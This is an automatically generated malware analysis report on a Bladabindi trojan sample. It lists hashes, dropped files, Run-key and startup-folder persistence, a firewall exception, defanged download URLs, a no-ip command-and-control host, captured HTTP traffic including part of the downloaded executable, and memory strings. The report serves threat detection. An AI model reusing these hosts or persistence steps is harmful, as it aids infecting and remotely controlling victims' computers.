Trojan.MSIL.Bladabindi_75e537aa12

by malwarelabrobot on September 28th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.MSIL.Bladabindi.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 75e537aa12508a3ed7caa3da0025a4e6
SHA1: ebded40b7fd1930aae61ba05db647d93ec815bda
SHA256: 41e67d6e82f690674002cd5d215b044a3a0f931eaf190d826705c43df8fc22c9
SSDeep: 1536:igtI7V YJVjjIVrAgK1Ug0zq1rqDiOCv/Xw89yka L0ocdcvZdYq71gAX:87kmymxqD3Cv/UKL0oH1gAX
Size: 108032 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: popeler.
Created at: 2014-09-12 00:05:39
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

File1.exe:312
File1.exe:1648
%original file name%.exe:1736
netsh.exe:204
svicihioiict.exe:1680

The Trojan injects its code into the following process(es):

ntvdm.exe:484
svicihioiict.exe:1016

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process File1.exe:312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\svicihioiict.exe (7385 bytes)

The process File1.exe:1648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (836 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (836 bytes)

The process %original file name%.exe:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\Startup\File0.exe (72 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\File1.exe (128662 bytes)

The process ntvdm.exe:484 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\DOCUMENTS AND SETTINGS (4 bytes)
C:\ (4 bytes)
%Program Files%\WIRESHARK (16 bytes)
%WinDir%\WinSxS (12 bytes)
%WinDir%\AppPatch (4 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319 (672 bytes)
%Documents and Settings%\All Users (4 bytes)
%WinDir%\Microsoft.NET\Framework (96 bytes)
%WinDir% (492 bytes)
C:\$Directory (3292 bytes)
%WinDir%\Temp\scs2.tmp (10145 bytes)
%System% (5136 bytes)
%WinDir%\WinSxS\Policies\x86_Policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773 (4 bytes)
C:\PROGRAM FILES (8 bytes)
%WinDir%\WinSxS\Policies\x86_Policy.6.0.Microsoft.Windows.Common-Controls_6595b64144ccf1df_x-ww_5ddad775 (4 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%System%\config (8 bytes)
%System%\wbem (1064 bytes)
%System%\drivers (32 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%Documents and Settings%\%current user% (4 bytes)
%WinDir%\Temp\scs1.tmp (33880 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs (4 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\scs1.tmp (0 bytes)
%WinDir%\Temp\scs2.tmp (0 bytes)

The process svicihioiict.exe:1680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\CLR Security Config\v2.0.50727.42\security.config.cch.new (752 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (1544 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (1320 bytes)

The Trojan deletes the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.1680.284593 (0 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.1680.284609 (0 bytes)

The process svicihioiict.exe:1016 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\Startup\1aa474a7e9c64d4ecae39105f8f64e52.exe (59080 bytes)

Registry activity

The process File1.exe:312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 89 25 06 15 5D 48 76 93 F8 7C F2 4D 9F 4D 76"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\1aa474a7e9c64d4ecae39105f8f64e52]
"US" = "@"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Environment]
"SEE_MASK_NOZONECHECKS" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"svicihioiict.exe" = "svicihioiict"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process File1.exe:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 98 BB 93 67 6A 19 F2 93 A1 F5 0F 35 32 49 C5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process %original file name%.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 E0 83 79 24 5A 7D B4 BB 7E D0 2B 27 92 0A 43"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Start Menu\Programs\Startup]
"File1.exe" = "File1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Start Menu\Programs\Startup]
"file0.exe" = "File0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process netsh.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B F1 1F 16 5D FE 0F 54 1F BD 69 8D FD 71 82 FA"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp]
"svicihioiict.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\svicihioiict.exe:*:Enabled:svicihioiict.exe"

The process svicihioiict.exe:1680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 8F 16 59 74 89 F9 34 9F 24 19 86 68 18 2C B4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process svicihioiict.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF C5 10 CB F6 A5 B6 37 56 92 06 DA FC 85 B2 63"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"1aa474a7e9c64d4ecae39105f8f64e52" = "%Documents and Settings%\%current user%\Local Settings\Temp\svicihioiict.exe .."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"1aa474a7e9c64d4ecae39105f8f64e52" = "%Documents and Settings%\%current user%\Local Settings\Temp\svicihioiict.exe .."

Dropped PE files

MD5 File path
99636ebcd121715b184e352c194f3b09 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\svicihioiict.exe
99636ebcd121715b184e352c194f3b09 c:\Documents and Settings\"%CurrentUserName%"\Start Menu\Programs\Startup\1aa474a7e9c64d4ecae39105f8f64e52.exe
99636ebcd121715b184e352c194f3b09 c:\Documents and Settings\"%CurrentUserName%"\Start Menu\Programs\Startup\File1.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ??????????????????????????
Product Version: 1.0.0.0
Legal Copyright: ??????????????????????????
Legal Trademarks:
Original Filename: Q.exe
Internal Name: Q.exe
File Version: 1.0.0.0
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 104212 104448 4.18984 a244d29dffb1e860b8bbad5a3eedcdb4
.sdata 114688 177 512 1.51393 49dcf9506c9fef057264413446077c61
.rsrc 122880 1348 1536 2.9171 5f59d298fb314113a4e01834e31edd9a
.reloc 131072 12 512 0.070639 7a3ff60ed60efe2b5e0bf1ebbae50bb6

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dc228.gulfup.com/25A8JS.exe?gu=FS73S-sbFBApfpI6NgPMxg&e=1410901512&n=66696c656e616d652a3d5554462d38272764352e657865 204.45.61.58
hxxp://gulfup.com/ch
hxxp://ge.tt/api/1/files/2mhyMmv1/0/blob?download 54.195.252.180
hxxp://open.ge.tt/1/files/2mhyMmv1/0/blob?download
hxxp://ec2-54-228-6-8.eu-west-1.compute.amazonaws.com/streams/2mhyMmv1/d5.exe?sig=-Ui0vqGdCDncE5EQIewjOSN5HRJlnuXJ6tY&type=download
hxxp://www.gulfup.com/ch 204.45.56.2
hxxp://w282617.blob4.ge.tt/streams/2mhyMmv1/d5.exe?sig=-Ui0vqGdCDncE5EQIewjOSN5HRJlnuXJ6tY&type=download 54.228.6.8
hxxp://w344216.open.ge.tt/1/files/2mhyMmv1/0/blob?download 54.247.122.87
asil66.no-ip.info 41.98.78.5


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /25A8JS.exe?gu=FS73S-sbFBApfpI6NgPMxg&e=1410901512&n=66696c656e616d652a3d5554462d38272764352e657865 HTTP/1.1
Host: dc228.gulfup.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 26 Sep 2014 18:51:40 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hXXp://VVV.gulfup.com/ch
Content-Type: application/octet-stream
Content-Disposition: attachment; 
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx</center&g
t;..</body>..</html>....



GET /1/files/2mhyMmv1/0/blob?download HTTP/1.1
Host: w344216.open.ge.tt
Connection: Keep-Alive


HTTP/1.1 307 Temporary Redirect
location: hXXp://w282617.blob4.ge.tt/streams/2mhyMmv1/d5.exe?sig=-Ui0vqGdCDncE5EQIewjOSN5HRJlnuXJ6tY&type=download
connection: keep-alive
transfer-encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://w282617.blob4.ge.
tt/streams/2mhyMmv1/d5.exe?sig=-Ui0vqGdCDncE5EQIewjOSN5HRJlnuXJ6tY&typ
e=download..connection: keep-alive..transfer-encoding: chunked..0..



GET /streams/2mhyMmv1/d5.exe?sig=-Ui0vqGdCDncE5EQIewjOSN5HRJlnuXJ6tY&type=download HTTP/1.1
Host: w282617.blob4.ge.tt
Connection: Keep-Alive


HTTP/1.1 200 OK
date: Sat, 27 Sep 2014 01:24:26 GMT
last-modified: Thu, 11 Sep 2014 21:03:04 GMT
etag: "f0b727728aaa6d794669e88377b6b37a-1"
accept-ranges: bytes
content-type: application/x-msdownload
content-length: 1031680
server: gbs
access-control-allow-origin: *
content-disposition: attachment
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......S
.................z...@........... ........@.. ........................
..............................................P...K......."_..........
................................................................. ....
........... ..H............text....y... ...z.................. ..`.sda
[email protected]..."_.......`...\............
..@[email protected][email protected]........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................H...........n.....
......RY...?...........................................0..........(...
. ....8....8Z...*.. ....8....(.... ....8...... ....8...... ....(....:.
...&*(.... ....8.....:.... ....8.....E....|...................|....(..
..9....& ....8~....E....4...4.......4.../.......8....& ....8P...(.... 
....8A........& ....81...8....(.... ....8....8f....9....8\... ........
....E........k...=...................z...........[....................
... ....8...... ....8....8....:8....&..(L...*.:8....&..(....*.&8..
<<< skipped >>>


GET /api/1/files/2mhyMmv1/0/blob?download HTTP/1.1
Host: ge.tt
Connection: Keep-Alive


HTTP/1.1 307 Temporary Redirect
location: hXXp://w344216.open.ge.tt/1/files/2mhyMmv1/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://w344216.open.ge.t
t/1/files/2mhyMmv1/0/blob?download..Connection: keep-alive..Transfer-E
ncoding: chunked..0..



GET /ch HTTP/1.1
Host: VVV.gulfup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Gulfup.com
Date: Fri, 26 Sep 2014 19:23:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
48..<META HTTP-EQUIV="Refresh" CONTENT="0;URL=hXXp://VVV.gulfup.com
.."> ..0..

The Trojan connects to the servers at the folowing location(s):

ntvdm.exe_484:

.text
`.data
.rsrc
KERNEL32.dll
NTDLL.DLL
ADVAPI32.dll
GDI32.dll
USER32.dll
SoftPC
mscoree.dll
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
BIOS keyboard buffer overflow
hardware keyboard buffer overflow
%s Mouse %d.01 already installed
%s Mouse %d.01 installed
d:\xpsp\base\mvdm\softpc.new\host\src\nt_timer.c
d:\xpsp\base\mvdm\softpc.new\host\src\nt_eoi.c
C:\IBMBIO.SYS
C:\IO.SYS
C:\IBMDOS.SYS
C:\MSDOS.SYS
\ntio404.sys
\ntio411.sys
\ntio412.sys
\ntio804.sys
\ntio.sys
VJOY.DLL
%s %lxh
d:\xpsp\base\mvdm\softpc.new\host\src\nt_com.c
d:\xpsp\base\mvdm\softpc.new\host\src\config.c
Software\Microsoft\Windows NT\CurrentVersion\WOW\Console
\\.\$VDMLPT2
\\.\$VDMLPT3
\\.\$VDMLPT1
FONT.NT
\ega.cpi
d:\xpsp\base\mvdm\softpc.new\host\src\nt_fulsc.c
Drive %c:
Incompatible DOS diskette, C H R N = %d %d %d %d
\\.\A:
\\.\?:
d:\xpsp\base\mvdm\softpc.new\host\src\nt_event.c
WINDOWS VMM 4.0
WINDOWS NT 3.1
WINDOWS 386 3.0
WINDOWS 286 3.0
\_default.pif
d:\xpsp\base\mvdm\softpc.new\host\src\nt_det.c
VrRemoveOpenNamedPipeInfo
VrConvertLocalNtPipeName
VrAddOpenNamedPipeInfo
VrIsNamedPipeHandle
VrIsNamedPipeName
VrWriteNamedPipe
VrReadNamedPipe
midiOutShortMsg
midiOutLongMsg
WINMM.DLL
d:\xpsp\base\mvdm\softpc.new\host\src\nt_hosts.c
NtDeviceIoControlFile failed %x
d:\xpsp\base\mvdm\softpc.new\host\src\nt_sec.c
SoftPc: NtDeCommitVirtualMemory failed !!!! Status = %lx
NTVDMD.DLL
Check Keyboard Status
\ntdos404.sys
\ntdos411.sys
\ntdos412.sys
\ntdos804.sys
\ntdos.sys
demDosDispCall %s
config.nt
PIPE
%c:%sNUL
Software\Microsoft\Windows\CurrentVersion\Setup
Unimplemented SVC %d
Software\Microsoft\Windows NT\CurrentVersion\WOW\CmdLine
%s=%s%s /p %s\system32
%s=%3.3u,%3.3u,%s\system32\%s.sys%s
KEYB
\KEYBOARD.SYS
\KEYJ31.SYS
\KEY02.SYS
\KEY01.SYS
\KEYAX.SYS
%s,%d,%s
\KB16.COM
DosKeybIDs
System\CurrentControlSet\Control\Keyboard Layout\
DosKeybCodes
00000409
Software\Microsoft\Windows NT\CurrentVersion\WOW\Compatibility
Broken pipe
Inappropriate I/O control operation
Operation not permitted
ega.rom
vga.rom
v7vga.rom
bios4.rom
bios1.rom
profile.spc
.spcprofile
d:\xpsp\base\mvdm\softpc.new\host\src\x86_emm.c
CS:x IP:x OP:x x x x x
ntvdm.pdb
Ut.Ht$Ht
ItKIt9It.IIt
tK<%uAj
HHt7Ht.Ht
YYt%F
SSSSSh
s*f;O%s$
V<%ue
t.HtHHt(Ht
GetCPInfo
NtEnumerateValueKey
NtOpenKey
ntdll.dll
RegCloseKey
RegQueryInfoKeyA
RegOpenKeyExA
GetConsoleOutputCP
GetSystemWindowsDirectoryA
GetWindowsDirectoryA
SetConsoleKeyShortcuts
VDMConsoleOperation
GetConsoleKeyboardLayoutNameA
EnumWindows
GetKeyState
VkKeyScanW
MapVirtualKeyA
GetKeyboardType
NtQueryValueKey
GetProcessHeap
ntvdm.exe
SoftPcEoi
cmdCheckTemp
cmdCheckTempInit
demIsShortPathName
'?--?1-?6-?:-??-??-:?-6?-1?--?1-?6-?:-??-:?-6?-1?--?--?1-?6-?:-??-:?-6?-1?
$$$(((---222888???
!"#$%&'( 
SoftPC-AT Version 3
89:;<=>?
autoexec.nt
00030<0?0
30333<3?3
<0<3<<<?<
?0?3?<???
!"#$%&'()
Userenv.dll
Software\Microsoft\Windows NT\CurrentVersion\Terminal Server
%SystemRoot%
\System32\command.com
%System%\ntvdm.exe
\\.\B:
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
%WinDir%
NTVDM.EXE
5.1.2600.5512 (xpsp.080413-2111)
Windows
Operating System
5.1.2600.5512
5The NTVDM CPU has encountered an illegal instruction."Internal error in NTVDM procedure.#NTVDM does not support a ROM BASIC.BFailure to allocate the requested number of Expanded Memory pages.*A continuous RESET state has been entered.,The CMOS file cmos.ram could not be created.,The CMOS file cmos.ram could not be updated.<The memory resources needed by NTVDM could not be allocated.
LAn installation file required by NTVDM is missing, execution must terminate.
Insufficient memory resources.=The NTVDM CPU has encountered an unsupported 386 instruction.TThe EMM command line in your config.nt contains invalid parameters or syntax errors.5The NTVDM CPU has encountered an unhandled exception.t
MS-DOS program files must end with the extension .EXE, .COM, or .BAT.
vAn application has attempted to %s, which cannot be supported. This may cause the application to function incorrectly./directly access an incompatible diskette format
16 bit Windows Subsystem
VThe system file is not suitable for running MS-DOS and Microsoft Windows applications."Memory error during intialization.
Unable to lock for exclusive access. Another application may be using the drive. When the other application has finished using the drive you may retry the operation.
Drive %c: ZThe Application attempted to enable DOS graphics mode. DOS graphics mode is not supported.
Function failed$NTVDM has encountered a System Error*Driver does not support selected Baud Rate<The system cannot open %s port requested by the application.

ntvdm.exe_484_rwx_00000000_00010000:

C:\DOCUME~1\ADM\STARTM~1\PROGRAMS\STARTUP\FILE0.EXE
FILE0 EXE
."/\[]:|<> =;,
c:\wina20.386
%WinDir%\SYSTEM32\COUNTRY.SYS
<META HTTP-EQUIV="Refres
89:;<=>?
1234567890-=
!@#$%^&*()_ 
789-456 1230.
!"#$%&,-./012
%WinDir%\SYSTEM32\COMMAND.COM
%File allocation table bad, drive %1
Invalid COMMAND.COM
!Press any key to continue . . .
Cannot execute %1
Error in EXE file
%WinDir%\TEMP\scs2.tmp
arameter vaCOMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
OS=Windows_NT
PATH=C:\Perl\site\bin;C:\Perl\bin;%System%;%WinDir%;%WinDir%\System32\Wbem;c:\PROGRA~1\WIRESH~1
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
SYSTEMROOT=%WinDir%
TEMP=%WinDir%\TEMP
TMP=%WinDir%\TEMP
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=hXXp://VVV.gulfup.com
\COMMAND.COM
COMSPEC=\COMMAND.COM
BMicrosoft(R) Windows DOS
FCOMMAND [[drive:]path] [device] [/E:nnnnn] [/P] [/C string] [/MSG]
H [drive:]path Specifies the directory containing COMMAND.COM file.
N /MSG Specifies that all error messages be stored in memory. You
%Intermediate file error during pipe
Switches may be preset in the DIRCMD environment variable. Override
>Quits the COMMAND.COM program (command interpreter).
]Displays or sets a search path for executable files.
$B | (pipe)
%Displays the MS-DOS version.
LRecords comments (remarks) in a batch file or CONFIG.SYS.
key to continue...."
PATH=PROMPT=COMSPEC=DIRCMD=
.COM.EXE.BAT?VBAPWRHSvDANEDSG
%WinDir%\SYSTEM32
[]|<> =;"

ntvdm.exe_484_rwx_00010000_00090000:

COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
%WinDir%\TEMP\scs2.tmp
89:;<=>?
0WINDOWS MS-DOS STARTUP FILE
0CONFIG.SYS VS CONFIG.NT
0CONFIG.SYS IS NOT USED TO INITIALIZE THE MS-DOS ENVIRONMENT.
0CONFIG.NT IS USED TO INITIALIZE THE MS-DOS ENVIRONMENT UNLESS A
0IS INITIALIZED. TO DISPLAY CONFIG.NT/AUTOEXEC.NT INFORMATION, ADD
